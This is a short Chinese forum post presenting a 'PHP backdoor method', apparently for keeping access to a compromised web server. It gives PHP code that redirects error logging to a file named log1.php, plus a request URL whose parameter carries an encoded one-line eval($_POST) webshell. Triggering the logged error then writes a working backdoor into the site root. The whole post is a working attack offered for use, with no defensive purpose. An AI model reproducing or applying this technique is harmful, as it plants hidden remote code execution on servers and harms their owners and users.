PHP留后门方法

admin 9月前 227

思路呢来源于phpmyadmin,可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取shell,

PHP也是可以开户日志记录的。具体操作如下。

随便找个PHP文件,比如a.php,加上如下代码

<?php

error_reporting(E_ALL);

ini_set("log_errors", "On");

ini_set("error_log","log1.php");

$arr=array();

var_dump($arr[$_REQUEST['x']]);

?>

然后怎么用呢,直接提交

http://www.xxxx.com/a.php?x=<%3fphp+eval(%40%24_POST%5b%27a%27%5d)%3b+%3f>

OK。再根目录下就可以看到log1.php一句话木马文件了。

最新回复 (0)
返回
发新帖